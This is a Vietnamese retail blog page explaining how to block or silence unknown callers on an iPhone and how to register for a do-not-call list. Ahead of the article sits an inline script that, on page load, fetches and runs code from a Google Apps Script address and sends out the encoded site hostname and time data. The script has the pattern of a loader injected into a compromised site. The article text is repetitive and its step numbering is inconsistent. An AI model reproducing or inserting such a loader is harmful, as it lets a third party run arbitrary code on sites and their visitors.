var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách chặn số lạ trên iphone để tránh các cuộc gọi làm phiền

Hãy thực hiện cài đặt chặn số không rõ nguồn gốc trên iPhone để tránh bị quấy rối bởi những cuộc gọi và tin nhắn không mong muốn. Nếu bạn chưa biết cách cài đặt, hãy tìm đến Siêu Thị Điện Máy – Nội Thất Chợ Lớn để được hỗ trợ. Vấn đề này có thể khiến bạn cảm thấy khó chịu và bực mình, hãy cùng đọc bài viết dưới đây để tìm hiểu thêm!

Hướng dẫn cách chặn số không rõ danh tính trên iphone để tránh những cuộc gọi quấy rối.

Tại sao bạn nên chặn các số lạ gọi đến điện thoại

Tất cả mọi người đã trải qua những lần gặp phải những cuộc gọi hoặc tin nhắn khủng bố từ các số điện thoại không quen. Việc nhận nhiều cuộc gọi như vậy sẽ ảnh hưởng đến cuộc sống của bạn rất nhiều, khiến bạn cảm thấy rất khó chịu.

Tại sao bạn nên chặn các số lạ gọi đến điện thoại? Bởi vì đó có thể là các cuộc gọi lừa đảo hoặc các cuộc gọi quảng cáo không mong muốn, gây phiền toái và rủi ro cho bạn.

Tại sao lại cần hạn chế các cuộc gọi từ số không có trong danh sách liên lạc.

Ngăn chặn các số điện thoại không có trong danh bạ trên iPhone để tránh mất nhiều thời gian cho các cuộc gọi và tin nhắn không mong muốn. Thực hiện điều này sẽ giúp bạn khắc phục vấn đề này.

Không bị quấy rầy bởi các cuộc gọi quảng cáo hay tư vấn sản phẩm.

Khi bạn không muốn nhận tin nhắn hoặc cuộc gọi từ những người khác.

Ngăn chặn các cuộc gọi giả mạo nhằm mục đích quảng cáo trả góp, bất động sản, …

Chuyển các số điện thoại mà bạn không muốn liên lạc sang chế độ spam.

Bạn sẽ không nhận bất kỳ thông báo nào từ các tin nhắn hay cuộc gọi không mong muốn.

Cách chặn các cuộc gọi ngoài danh bạ siêu đơn giản

Cách chặn từng số điện thoại trên iphone

Mỗi chiếc điện thoại có thể được ngăn chặn và điều này có thể áp dụng cho các phiên bản iPhone từ cũ đến mới, bao gồm cả iPhone 14 phiên bản 128GB với màu sắc tím.

Chọn biểu tượng Điện thoại -> Truy cập vào phần Gần đây -> Nhấn vào biểu tượng chữ i ở số cần chặn -> Theo bước 1.

Cách chặn từng số điện thoại trên iPhone giúp người dùng có thể ngăn chặn các cuộc gọi và tin nhắn không mong muốn từ các số điện thoại cụ thể, đảm bảo tính riêng tư và giảm thiểu phiền toái.

Chặn các số điện thoại bạn muốn trên iPhone.

Bước 2: Chọn Chặn số điện thoại này => Nhấn vào tùy chọn Chặn cuộc gọi.

Cách chặn từng số điện thoại trên iPhone giúp người dùng có thể ngăn chặn các cuộc gọi và tin nhắn không mong muốn từ các số điện thoại cụ thể, đảm bảo tính riêng tư và giảm thiểu phiền toái.

Cấm liên lạc bạn không muốn nhận điện thoại, tin nhắn.

Để hủy chặn các liên lạc, bạn có thể thực hiện các bước sau đây:

Bước 1: Truy cập vào Cài đặt => Chọn mục Điện thoại => Tìm và chọn Liên hệ bị hạn chế.

Trên giao diện hiển thị, quý khách vui lòng lựa chọn Tùy chỉnh và tìm kiếm số điện thoại cần hủy chặn trước khi vuốt sang bên trái để hoàn tất quá trình hủy chặn.

Cách chặn số điện thoại trên iphone bằng chế độ không làm phiền

Chỉ những số điện thoại được lưu trong danh sách liên lạc của bạn hoặc được chỉ định mới có thể liên lạc với bạn khi chế độ không làm phiền được kích hoạt. Các số không có trong danh sách liên lạc sẽ bị tắt tiếng thông báo khi nhắn tin hoặc gọi đến.

Bước 1: Truy cập vào phần Cài đặt => Chọn tính năng Ngừng quấy rầy.

Bấm lựa chọn Đồng ý chặn cuộc gọi từ ở Bước 2. Tiếp theo, chọn Tất cả danh bạ để ngăn chặn cuộc gọi từ số không quen.

Trên iphone, bạn có thể sử dụng chế độ không làm phiền để chặn số điện thoại không mong muốn hoặc gây phiền toái. Bạn chỉ cần thiết lập chế độ này và chỉ định những số điện thoại cần chặn để giữ cho điện thoại của bạn yên tĩnh và không bị gián đoạn.

Lựa chọn Tất cả liên hệ để ngăn chặn các số điện thoại không rõ nguồn gốc trên iPhone.

Bước 3: Quay trở lại màn hình và kích hoạt chế độ không làm phiền trên điện thoại iPhone.

Trên iphone, bạn có thể sử dụng chế độ không làm phiền để chặn số điện thoại không mong muốn hoặc gây phiền toái. Bạn chỉ cần thiết lập chế độ này và chỉ định những số điện thoại cần chặn để giữ cho điện thoại của bạn yên tĩnh và không bị gián đoạn.

Kích hoạt chế độ không làm phiền trên thiết bị iphone.

Cách tắt tiếng các cuộc ngoài danh bạ trên iphone

Để bắt đầu, hãy vào phần Cài đặt => Chọn Thiết bị di động => Chọn tùy chọn “Tắt cuộc gọi không rõ ràng”.

Để tắt tiếng các cuộc gọi từ số không có trong danh bạ trên iPhone, người dùng có thể vào phần Cài đặt, chọn Điện thoại, chuyển sang Tắt tiếng các cuộc gọi ngoài danh bạ.

Thực hiện ngắt âm thanh cuộc gọi không rõ.

Nhấn nút màu xanh để tắt là bước thứ hai, như vậy bạn sẽ không bị quấy rầy bởi các cuộc gọi từ các số không rõ nguồn gốc.

Kích hoạt chức năng tắt âm cuộc gọi không rõ để ngăn thông báo từ số không quen.

Cách chặn số ngoài danh bạ trên iphone bằng tin nhắn

Gửi thư ngắn gọn tới Cục An toàn Thông tin để ngăn chặn các tin nhắn rác. Các số điện thoại di động được xác định là số rác hoặc số quảng cáo sẽ bị tự động chặn và không thể nhắn tin hoặc gọi điện cho bạn. Đây là cách đơn giản để tránh bị làm phiền bởi những tin nhắn không mong muốn.

Với chỉ một cú pháp đơn giản “Soạn DK DNC Gửi 5656”, bạn có thể đăng ký vào “Danh sách không quảng cáo”. Nếu muốn huỷ, chỉ cần sử dụng cú pháp “HUY DNC Gửi 5656”.

Chặn các số không rõ nguồn gốc trên điện thoại iPhone là rất quan trọng để không ảnh hưởng đến cuộc sống hàng ngày của bạn. Hy vọng những thông tin trên sẽ giúp bạn tránh khỏi sự quấy rầy bởi các cuộc gọi không cần thiết, các cuộc gọi từ số không có trong danh bạ, …

Xem thêm những mẫu điện thoại iPhone đang được ưa chuộng tại Siêu Thị Điện Máy – Nội Thất Chợ Lớn: